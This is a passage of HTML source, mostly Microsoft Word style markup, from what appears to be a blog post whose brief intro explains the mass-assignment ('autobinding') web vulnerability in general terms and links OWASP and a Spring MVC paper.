<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
<br />
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></span></div>
<br />
<h3 class="MsoNormal" style="text-align: left;">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Intro</span></h3>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">If you
don’t want to read all this text, you can <a href="https://www.youtube.com/watch?v=l5hU1Hq-gsA">watch video from the 29thmeeting of Defcon Russia Group (in Russian)</a> </span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">There is a
not so well-known vulnerability type - "autobinding", or "mass
assignment". The idea this type is based on a feature that is implemented
in many frameworks. It allows a framework to automatically bind HTTP request
parameters to objects and make them accessible to a developer. However, an
attacker can add additional HTTP request params and they will possibly be bounded
to an object. Depending on a victim software and its logic, the attacker can achieve
some interesting results.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The autobinding
feature is pretty widespread for frameworks, which makes attack surface rather
wide. However, usually it's hard to find them without knowing source code and
impact of a vuln strongly depends on an application.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">You can
read about this type of vulns on OWASP</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">There are also
some simple examples, so if you are not familiar with it, I recommend that you look
at it.</span></div>
<div class="MsoNormal">
<a href="https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet" target="_blank"><span lang="EN-US" style="mso-ansi-language: EN-US;">https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet</span></a><span lang="EN-US" style="mso-ansi-language: EN-US;"> </span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">A
"real" example of such vulnerability and some additional information
for Spring MVC framework was published by Ryan Berg and Dinis Cruz in 2011 - </span><a href="https://o2platform.files.wordpress.com/2011/07/ounce_springframework_vulnerabilities.pdf" target="_blank"><span lang="EN-US" style="mso-ansi-language: EN-US;">https://o2platform.files.wordpress.com/2011/07/ounce_springframework_vulnerabilities.pdf</span></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"> </span><span lang="EN-US" style="mso-ansi-language: EN-US;"> </span></div>
<div class="MsoNormal">
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></div>
<br />
<div class="MsoNormal">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
